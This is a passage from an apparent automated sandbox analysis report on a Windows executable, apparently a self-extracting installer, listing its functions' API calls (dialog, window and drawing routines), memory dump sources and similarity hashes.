                                                                                          • GetParent.USER32(?), ref: 00407418
                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                                          • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                                          • GetClientRect.USER32(?,?), ref: 0040753D
                                                                                            • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                                            • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                                          • ClientToScreen.USER32(?,?), ref: 00407446
                                                                                            • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 747815384-0
                                                                                          • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                                          • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                                          • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                                          • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                          • String ID:
                                                                                          • API String ID: 801014965-0
                                                                                          • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                                          • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                                          • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                                          • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 00407831
                                                                                          • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                                          • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                                          • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                                          • GetWindowDC.USER32(?), ref: 00407896
                                                                                          • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                                          • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                          • String ID:
                                                                                          • API String ID: 2586545124-0
                                                                                          • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                                          • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                                          • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                                          • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                                            • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                                          • wsprintfA.USER32 ref: 00403C31
                                                                                          • wsprintfA.USER32 ref: 00403C5E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$wsprintf
                                                                                          • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                          • API String ID: 2704270482-695273242
                                                                                          • Opcode ID: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                                          • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                                          • Opcode Fuzzy Hash: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
                                                                                          • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                                          • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                                          • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                                          • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                                          • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                                          • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMessageSend$Focus
                                                                                          • String ID:
                                                                                          • API String ID: 3946207451-0
                                                                                          • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                                          • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                                          • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                                          • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                                          • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$AddressLibraryLoadProc
                                                                                          • String ID: hA$SetWindowTheme$uxtheme
                                                                                          • API String ID: 324724604-1539679821
                                                                                          • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                                          • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                                          • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                                          • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                                          • GetDC.USER32(00000000), ref: 004076E7
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                                          • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2693764856-0
                                                                                          • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                                          • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                                          • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                                          • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                                          APIs
                                                                                          • GetDC.USER32(?), ref: 0040721C
                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                                          • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                                          • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                                          • SelectObject.GDI32(?,?), ref: 00407266
                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                                          • SelectObject.GDI32(?,?), ref: 004072A7
                                                                                          • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                          • String ID:
                                                                                          • API String ID: 2466489532-0
                                                                                          • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                                          • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                                          • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                                          • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                                          • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                                          • wsprintfW.USER32 ref: 0040821E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                          • String ID: %d%%
                                                                                          • API String ID: 3753976982-1518462796
                                                                                          • Opcode ID: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                                          • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                                          • Opcode Fuzzy Hash: feb85234e790cb1b9b57286cee245e86f42689e6b92afad3e333e99d88824fca
                                                                                          • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                                          APIs
                                                                                          • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                                          • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                                          • SuspendThread.KERNEL32(00000298), ref: 0040841B
                                                                                          • ResumeThread.KERNEL32(00000298), ref: 00408438
                                                                                          • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                          • String ID:
                                                                                          • API String ID: 4151135813-0
                                                                                          • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                                          • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                                          • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                                          • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID: %%M/$%%M\
                                                                                          • API String ID: 613200358-4143866494
                                                                                          • Opcode ID: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                                          • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                                          • Opcode Fuzzy Hash: 0374d482a13ba9aee8c5e10bc5e2984b567f93264fe1f34f69114edc9141db84
                                                                                          • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID: %%T/$%%T\
                                                                                          • API String ID: 613200358-2679640699
                                                                                          • Opcode ID: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                                          • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                                          • Opcode Fuzzy Hash: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                                          • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID: %%S/$%%S\
                                                                                          • API String ID: 613200358-358529586
                                                                                          • Opcode ID: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                                          • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                                          • Opcode Fuzzy Hash: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                                          • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                                          APIs
                                                                                          • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionThrow
                                                                                          • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                                          • API String ID: 432778473-1797977924
                                                                                          • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                                          • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                                          • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                                          • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                                            • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                                            • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                                            • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                                            • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                          • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                          • API String ID: 4038993085-372238525
                                                                                          • Opcode ID: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                                          • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                                          • Opcode Fuzzy Hash: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
